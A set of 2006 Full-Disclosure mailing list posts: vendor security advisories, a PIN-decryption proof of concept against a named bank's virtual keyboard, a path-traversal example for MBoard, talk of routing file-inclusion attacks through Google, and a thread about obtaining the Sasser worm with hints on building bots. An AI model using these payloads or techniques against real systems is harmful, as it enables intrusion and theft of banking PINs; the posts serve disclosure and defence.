[Full-disclosure] [ GLSA 200611-22 ] Ingo H3: Folder name shell command injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Ingo H3: Folder name shell command injection Date: November 27, 2006 Bugs: #153927 ID: 200611-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Ingo H3 is vulnerable to arbitrary shell command execution when handling procmail rules. Background == Ingo H3 is a generic frontend for editing Sieve, procmail, maildrop and IMAP filter rules. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/horde-ingo1.1.2= 1.1.2 Description === Ingo H3 fails to properly escape shell metacharacters in procmail rules. Impact == A remote authenticated attacker could craft a malicious rule which could lead to the execution of arbitrary shell commands on the server. Workaround == Don't use procmail with Ingo H3. Resolution == All Ingo H3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/horde-ingo-1.1.2 References == [ 1 ] CVE-2006-5449 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5449 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200611-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp7NHML4Yqpy.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cursor snarfing - a new class of vulnerability and attack in Oracle
Hey all, I've just written a paper detailing a fairly common PL/SQL programming error related to cursors that leads to a new class of vulnerability in Oracle. You can get a copy of the paper from http://www.databasesecurity.com/ . Cheers, David Litchfield NGSSoftware Ltd +44(0) 208 401 0070 http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anonymizing RFI Attacks Through Google
On Sat, Nov 25, 2006 at 01:01:54AM -0500, Dude VanWinkle wrote: On 11/25/06, endrazine [EMAIL PROTECTED] wrote: this process of attack is a mere waste of time if one only reaches anonymity : in order to give google this new url to crawl, you'd have to either create a web page that points to this very page, or enter the url in the google database directly using their form. None of those two options are safer than attacking the website directly (google might vey well log your actions), so what's the point ? a lot of people are used to seeing google spider tracks in their logs. anonymizing your attack via google may make the admin investigating the attack think that a malfunctioning web bot was responsible for the attack, or they may skim over the entire incident accidentally. Even if you are aware of an attack, the Google bot will not tell you where the attacking URL comes from. So, if you're investigating the hack, you have no data; you need to get Google to cooperate with you, so they can find where the URL came from, and then investigate from there. That adds Google as an additional cut-out and delays any investigation. -- Vincent ARCHER [EMAIL PROTECTED] Tel : +33 (0)1 40 07 47 14 Fax : +33 (0)1 40 07 47 27 Deny All - 23, rue Notre Dame des Victoires - 75002 Paris - France ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)
Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a
post by HispaSec. This is about breaking virtual keyboards
implementations, and the encryption some of them use (most of them send
the data in clear text with the image). HispaSec was a reference by which
we found the banks' site as one using a virtual keyboard.
http://blogs.securiteam.com/index.php/archives/678
http://hispasec.com/laboratorio/cajamurcia_en.htm
Gadi.
Quoting:
Recently, I stumbled upon a post by HispaSec showing off a screen
shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which
nicely showed how a trojan horse can, utilizing a key stroke capture and
screenshot capture, grab a user's PIN number, fairly easily, and wondered
why are they taking this approach when the PIN numbers can be easily
retrieved by sniffing the data sent by the user to the banking site, even
though they are encrypted.
Image based keyboard (or virtual keyboards) were invented to make life
harder for banking or phishing trojan horses (specifically key-stroke
loggers or key loggers), some even suggested they be used specifically to
avoid these trojan horses. The bad guys adapted to this technology and
escalated. Now the trojan horses take screenshots of where the mouse
pointer is to determine what number they clicked on. Thing is, it is often
unnecessary as in most implementations of this technique that we looked
into (meaning, not all) it was flawed.
Instead of sending the remote image and waiting for the key-stroke
information to be sent back to the server (the technique which the
screenshots for pointer location on-click described above was used) some
banks send the PIN number in cleartext, while others encrypt them, one
such example is cajamurcia. Even when the encryption is used, banks tend
to implement it badly making it easy to recover the PIN number from the
encrypted form.
I investigated a bit more on how cajamurcia handles such PIN strokes (with
virtual keyboards) and I noticed something strange, they take the
timestamp of their server (cajamurcia) and send it to you - this already
posses a security problem - and this timestamp is then used to encrypt the
PIN number you entered.
This would have been a good idea if the timestamp was not sent back to the
server, making it hard or semi-hard to guess the timestamp used to encrypt
the data, but at the same time making it harder for the server to know
what timestamp was provided to the client (unless they store it inside
their session information). Anyhow, as it is sent back to the server, we
have everything we need to decrypt the data (PIN number).
PoC:
A request to the server would look like:
OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001
PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si
PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01
We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being
the timestamp and PIN being the encrypted form of the PIN number. If we
feed these into the following JS code:
https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js
function hexToString (h) {
var r = ;
for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) {
r += String.fromCharCode (parseInt (h.substr (i, 2), 16));
}
return r;
}
calcula = '1161006956';
ciphertext = hexToString('0xBBCB6E341C56C6B2');
var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, );
console.debug(cleartext);
We will get our original PIN number. This isn't necessarily easier as it
requires data capture, which isn't always easy, but screen captures
usually require either an OCR, or manual labor, which the above code does
not.
One needs to remember that Javascript (or any client-side code and
information) is indeed on the client's side and under the client's
control. An attacker can kick it aside, or learn to emulate it and attack
it - manipulate it. Client-side encryption where the code and key are
visible is pointless. No matter how much obfuscation or cross-frame and
cross-file scripting is used, calling for different functions and
parameters, nor how many functions you obfuscate your code through, it can
be read and maniuplated.
We made several email and phone attempts over the past couple of months to
reach cajamurcia and report this security issue to them. Gadi Evron even
asked a couple of folks in Spain to help with contacting them by phone,
even speaking directly to security folks there. We were unsuccessful.
The bank is already under attack by the over-kill screenshot trojan
horses. We release this information in full disclosure in the hope many
online commerce sites using similar techniques or even sending the
information in the clear will fix their implementations of the virtual
keyboard Click-Me Number-Images Schemes. These are broken by the use of
the trojan horses we discussed, but that's a whole other story.
Noam Rathaus
___
Full-Disclosure - We
[Full-disclosure] Sasser or other nasty worm needed
I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MHL-2006-003 Public Advisory: mboard file creation issue
MHL-2006-004 - Public Advisory +---+ |mboard Security Issue | +---+ PUBLISHED ON November 26th, 2006 PUBLISHED AT http://www.mayhemiclabs.com/advisories/MHL-2006-004.txt http://www.mayhemiclabs.com/wiki/wikka.php?wakka=MHL2006004 PUBLISHED BY Mayhemic Labs http://www.mayhemiclabs.com security AT mayhemiclabs DOT com GPG key: 0x56143F84 APPLICATION MBoard - PHP message board http://www.phpjunkyard.com/php-message-board.php MBoard is a PHP message board script (a simple forum). AFFECTED VERSIONS Versions 1.22 and below ISSUES MBoard does not check the Post ID for malicious data when replying, allowing an attacker to create blank files on the system wherever the web server has write access. Example: An attacker can reply to a message, and edit the orig_id variable to something malicious (../../../../../../tmp/ZOMGHAX) mboard will then create the specified file (appending the configured extension. WORKAROUNDS Enabling Magic Quotes will negate the issue. SOLUTIONS Upgrade to version 1.3 REFERENCES MBoard - http://www.phpjunkyard.com/php-message-board.php TIMELINE October 11th, 2006 Vendor/Developer Notified Vendor/Developer Response Recieved October 25th, 2006 Vendor/Developer Followup Vendor/Developer Response Recieved November 16th, 2006 Vendor/Developer Followup November 18th, 2006 New Version Released November 26th, 2006 Advisory Released ADDITIONAL CREDIT N/A LICENSE Creative Commons Attribution-ShareAlike License http://creativecommons.org/licenses/by-sa/2.5 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The state of JavaScript Hacking
Please take my apologize if the following post has offended you in any way. The reason I posted it here is because I wanted to get this massage heard by a wider audience. What better place to talk about this than the security mailing lists. http://www.gnucitizen.org/blog/the-state-of-javascript-hacking/ In this post I would like to share a few thoughts with you about the importance of JavaScript and other under appreciate web technologies and their impact on the computer security industry and our lives in general. The purpose of this is to bring more light on the matter. Although this topic is becoming clearer now, I can still see quite a lot confused security professionals thriving to comprehend the core principles of these, relatively new, types of attacks. In this article I hope that I will be able to present my view as briefly and accurately as possible. As you might already know JavaScript is becoming more and more popular among Web developers. The reason for this sudden growth is AJAX which among other technologies brought some quite useful and exciting features. Historically, AJAX is nothing new. This technology has been known for ages although as I said earlier it has started being implemented on a large scale just recently. On of the biggest AJAX evangelist up to day is Google which I believe is responsible for the AJAX hype in general. This is just a personal opinion. AJAX and JavaScript are nothing new to security professionals, either. You can see that various attack vectors related to these technologies has been discovered in the past. I am not talking about browser vulnerabilities but pure design and implementation insecurities. Among them there are techniques such as XSS (a.k.a Cross-site scripting) and CSRF (a.k.a Cross-site request forgery). Both of them outline ways of performing information gathering, session hijacking and request forging. From the user prospective this is very serious but not that many companies have taken it seriously because they don't really understand them, I suppose. You are probably aware of XSS and CSRF because the state of JavaScript hacking today is based around them. However, because of them the security industry has never really understood their real potential. Simply put, performing session hijacking is not as interesting as sniffing the air and forging someone's requests is just not as fun as obtaining remote access. Will that change? What security professionals must understand is that JavaScript is not about web pages anymore. It is a technology that is currently overtaking every WEB frontline and the desktop too. JavaScript is used on servers, web pages and desktop applications. It is a bridge technology. WEB designers use JavaScript to glue visual elements while browser vendors glue desktops and servers. The technology is the same all over the place which means less coding. That results into less money spent. Very utopic I must say. If you have less overhead with developing desktop and web applications with JavaScript don't you think that attackers will have the same benefit? They can write cross-platformed viruses that can compromise desktop and web applications at the same time. Code once, destruct everywhere! Mozilla and Adobe are the biggest cheerleaders in this game. Microsoft is somewhere behind but they are quickly catching up. Mozilla with their XUL makes attackers life so much easier. It is not that the Mozilla browser is vulnerable to any specific type of attack but the past has already proved many times that eventually someone will find an issue with the architecture. Then people will find the same mistake in other places. The Mozilla XUL is considered a true RIA (Rich Internet Application) platform that is currently the base of many open source products. All of them support JavaScript, CSS, Flash (if installed) and Java (if installed). If the developers of these applications don't have deep understandings of the security implications of the Mozilla platform the WEB will become suddenly very dangerous place for them. Adobe on the other hand is making the process of creating a browser so transparent that everyone, I mean everyone, even your grandma will be able to create one in seconds. I am talking about Adobe's Apollo framework which is build on the top of Flex. If you haven't heard of it go and research now. Come back later. Don't get me wrong, I will probably use this platform to write a few security tools but just think about this for a second: developers will be able to write applications that will integrate the desktop with the WEB using already proven WEB technologies such as JavaScript, CSS, ActionScript, Flash and AJAX. I don't really know what Apollo's security model will be but apparently you can do whatever you want as long as the application is installed on the host environment. BTW, you install applications with a single click. Moreover, given the fact that Flash is so well spread, I am almost 90% sure that Adobe will
[Full-disclosure] rPSA-2006-0218-1 ImageMagick
rPath Security Advisory: 2006-0218-1 Published: 2006-11-27 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: ImageMagick=/[EMAIL PROTECTED]:devel//1/6.2.3.3-3.4-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5456 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4601 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0082 https://issues.rpath.com/browse/RPL-811 https://issues.rpath.com/browse/RPL-389 Description: Previous versions of the ImageMagick package contained multiple vulnerabilities. Attacker-supplied malformed image files may allow arbitrary code execution as the running user. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2006-0219-1 info install-info texinfo
rPath Security Advisory: 2006-0219-1 Published: 2006-11-27 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1 install-info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1 texinfo=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4810 https://issues.rpath.com/browse/RPL-810 Description: Previous versions of the texinfo package can be caused to execute arbitrary code contained in an intentionally malformed texinfo file. These texinfo commands are often run automatically when building software packages. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] REMLAB Web Mech Designer 2.0.5 Path Disclosure Vulnerability
Description: REMLAB http://remlab.sourceforge.net/ is a fully fuctional cross-platform web-based Battlemech designer for the tactical board game Battletech http://www.classicbattletech.com/ . REMLAB is built entirely on HTML, PHP, and JavaScript with AJAX functionality. The vulnerability exists in calculate.php script which allows remote attackers to obtain sensitive information via an HTTP request to calculate.php that contains wrong value in Tonnage parameter. This causes the information to be leaked in an error message. External References: Mitre CVE: CVE-2006-5896 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5896 NVD NIST: CVE-2006-5896 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-5896 OSVDB: 30264 http://www.osvdb.com/displayvuln.php?osvdb_id=30264 Summary: REMLAB is a fully fuctional cross-platform web-based Battlemech designer for the tactical board game Battletech. A security problem in the product allows attackers to gather the true path of the server-side script. Release Date: November 27 2006 Severity: Risk: Low CVSS Metrics Access Vector: Remote Access Complexity: Low Authentication: not-required Confidentiality Impact: Partial Integrity Impact: None Availability Impact: None Impact Bias: Normal CVSS Base Score: 2.3 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: Path disclosure. SecureScout Testcase ID: TC 17937 Vulnerable Systems: REMLAB Web Mech Designer 2.0.5 http://sourceforge.net/project/showfiles.php?group_id=165798 Vulnerability Type: Input Validation error - The calculate.php script has a flaw which leads to a Warning. This is an input validation fault when the script is not testing the data passed. Vendor Status: The Vendor has been contacted on November 14th 2006, by email and phone,. Vendor has not responded. There is no official patch at this time. Workaround: Disable warning messages: modify in the php.ini file the following line: display_errors = Off . Example: HTTP REQUEST http://[TARGET]/[REMLAB-directory]/include/calculate.php?Tonnage=%60 REPLY ... bWarning/b: Division by zero in b D:\WWWRoot\username\calculate.php/b on line b438/bbr / ,,0.00,,1,,2,,12,,12,,8,,8,,2,,2,,10,,0.0,,0.0 ... URL of Original Advisory: http://www.netvigilance.com/advisory0007 Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com http://www.netvigilance.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1219-1] New texinfo packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1219-1[EMAIL PROTECTED] http://www.debian.org/security/ Noah Meyerhans November 27, 2006 - Package: texinfo Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2005-3011 CVE-2006-4810 BugTraq ID : 14854 20959 Multiple vulnerabilities have been found in the GNU texinfo package, a documentation system for on-line information and printed output. CVE-2005-3011 Handling of temporary files is performed in an insecure manner, allowing an attacker to overwrite any file writable by the victim. CVE-2006-4810 A buffer overflow in util/texindex.c could allow an attacker to execute arbitrary code with the victim's access rights by inducing the victim to run texindex or tex2dvi on a specially crafted texinfo file. For the stable distribution (sarge), these problems have been fixed in version 4.7-2.2sarge2 Note that binary packages for the mipsel architecture are not currently available due to technical problems with the build host. These packages will be made available as soon as possible. For unstable (sid) and the upcoming stable release (etch), these problems have been fixed in version 4.8.dfsg.1-4 We recommend that you upgrade your texinfo package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 3.1 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.dsc Size/MD5 checksum: 622 f146d738696417a3f14e04875066ef9a http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7.orig.tar.gz Size/MD5 checksum: 1979183 72a57e378efb9898c9e41ca839554dae http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.diff.gz Size/MD5 checksum:10614 07a591b00a79ba8e2acf13d7654bf3e8 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_alpha.deb Size/MD5 checksum: 207720 1fce59e479c10386d5bab3d8aec99ddd http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_alpha.deb Size/MD5 checksum: 884956 93a3606294fd0059390b7da3c5803a1a amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_amd64.deb Size/MD5 checksum: 191308 035c9fb7bffa818819e6e104218d5911 http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_amd64.deb Size/MD5 checksum: 863680 8300c746fbb75231a09229f32f57d126 arm architecture (ARM) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_arm.deb Size/MD5 checksum: 178812 d8781c075692500d4d6a799019697a72 http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_arm.deb Size/MD5 checksum: 848862 4d31ba02e3004a5e290d6204ba402b19 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_hppa.deb Size/MD5 checksum: 867668 934d2a72b73c4342066f1fba21c35fff http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_hppa.deb Size/MD5 checksum: 195122 07ea3515643ddb8dc29791802974ec40 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_i386.deb Size/MD5 checksum: 846972 eb370f53f4db1681ead784353f6711c4 http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_i386.deb Size/MD5 checksum: 179614 ee08c755b1eb00043173acfdae2420d7 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_ia64.deb Size/MD5 checksum: 912350 c99196682ffe5436a1f99da332e77f91 http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_ia64.deb Size/MD5 checksum: 229398 e9e6dca2f2250bd07c0605e393105339 m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_m68k.deb Size/MD5 checksum: 171354 93b5762ecf847bba77396f08b04e225e http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_m68k.deb Size/MD5 checksum: 838386 2d63f36ef81c84ae8bdad8f2be5f1797 mips architecture (MIPS (Big Endian))
Re: [Full-disclosure] Sasser or other nasty worm needed
Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Sasser or other nasty worm needed
wow, the fastest way to catch any type of worm like that is to stick an unpatched, no A/V running, windows box out on the internet. You'll have so many bugs you won't know what to do with them all... Exibr -Original Message- From: kikazz [mailto:[EMAIL PROTECTED] Sent: Sunday, November 26, 2006 5:32 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] Sasser or other nasty worm needed I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. You're kidding, right? .. just take a fresh install of Win2K and hook it to the Internet. Go get coffee. Come back in ~15min. Boot to BartPE (or Knoppix, etc) and look for anything new in %systemroot%. You'll probably have more than one. It'll be a binary though, probably packed/encrypted 3+ times (and that's annoying, but not impossible, to reverse-engineer). The source code for all the [SD|RX|AGO]bot variants is easily found on the web. Recompile in Visual Basic, pack with UPX (or whatever) and off you go. To prison that is... Meanwhile .. a quick look at your email : Received: from blueberry ( [69.3.80.94]) by mx.google.com with ESMTP id i20sm9690041wxd.2006.11.26.14.32.22; Sun, 26 Nov 2006 14:32:22 -0800 (PST) From: kikazz [EMAIL PROTECTED] suggests that you aren't a teacher at all .. network:IP-Network-Block:69.3.80.88 - 69.3.80.95 network:Org-Name:Compu' Counts Consulting Inc. network:Street-Address:6174 Darleon Place network:City:ALEXANDRIA network:State:VA network:Postal-Code:22310 sigh .. another consultant that is trying to get other folks to do his dirty work... Cheers, Michael Holstein CISSP GCIA Information Security Administrator Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd)
More than a year Old (3rd August, 2005) -
Defeating CITI-BANK Virtual Keyboard Protection
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html
http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip
http://xforce.iss.net/xforce/xfdb/21727
Regards,
-d
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron
Sent: Sunday, November 26, 2006 12:18 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards
andPhishing Banks (fwd)
Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a
post by HispaSec. This is about breaking virtual keyboards implementations,
and the encryption some of them use (most of them send the data in clear
text with the image). HispaSec was a reference by which we found the banks'
site as one using a virtual keyboard.
http://blogs.securiteam.com/index.php/archives/678
http://hispasec.com/laboratorio/cajamurcia_en.htm
Gadi.
Quoting:
Recently, I stumbled upon a post by HispaSec showing off a screen shot
trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely
showed how a trojan horse can, utilizing a key stroke capture and screenshot
capture, grab a user's PIN number, fairly easily, and wondered why are they
taking this approach when the PIN numbers can be easily retrieved by
sniffing the data sent by the user to the banking site, even though they are
encrypted.
Image based keyboard (or virtual keyboards) were invented to make life
harder for banking or phishing trojan horses (specifically key-stroke
loggers or key loggers), some even suggested they be used specifically to
avoid these trojan horses. The bad guys adapted to this technology and
escalated. Now the trojan horses take screenshots of where the mouse pointer
is to determine what number they clicked on. Thing is, it is often
unnecessary as in most implementations of this technique that we looked into
(meaning, not all) it was flawed.
Instead of sending the remote image and waiting for the key-stroke
information to be sent back to the server (the technique which the
screenshots for pointer location on-click described above was used) some
banks send the PIN number in cleartext, while others encrypt them, one such
example is cajamurcia. Even when the encryption is used, banks tend to
implement it badly making it easy to recover the PIN number from the
encrypted form.
I investigated a bit more on how cajamurcia handles such PIN strokes (with
virtual keyboards) and I noticed something strange, they take the timestamp
of their server (cajamurcia) and send it to you - this already posses a
security problem - and this timestamp is then used to encrypt the PIN number
you entered.
This would have been a good idea if the timestamp was not sent back to the
server, making it hard or semi-hard to guess the timestamp used to encrypt
the data, but at the same time making it harder for the server to know what
timestamp was provided to the client (unless they store it inside their
session information). Anyhow, as it is sent back to the server, we have
everything we need to decrypt the data (PIN number).
PoC:
A request to the server would look like:
OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001
PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si
PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01
We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being
the timestamp and PIN being the encrypted form of the PIN number. If we feed
these into the following JS code:
https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js
function hexToString (h) {
var r = ;
for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) { r +=
String.fromCharCode (parseInt (h.substr (i, 2), 16)); } return r; } calcula
= '1161006956'; ciphertext = hexToString('0xBBCB6E341C56C6B2');
var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, );
console.debug(cleartext);
We will get our original PIN number. This isn't necessarily easier as it
requires data capture, which isn't always easy, but screen captures usually
require either an OCR, or manual labor, which the above code does not.
One needs to remember that Javascript (or any client-side code and
information) is indeed on the client's side and under the client's control.
An attacker can kick it aside, or learn to emulate it and attack it -
manipulate it. Client-side encryption where the code and key are visible is
pointless. No matter how much obfuscation or cross-frame and cross-file
scripting is used, calling for different functions and parameters, nor how
many functions you obfuscate your code through, it can be read and
maniuplated.
We made several email and phone attempts over the past couple of months to
reach cajamurcia and report this security issue to them. Gadi Evron even
asked a couple of folks in Spain to help with contacting them by phone, even
speaking
Re: [Full-disclosure] Sasser or other nasty worm needed
What am I Consultant? School Teacher? Terrorist? On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at 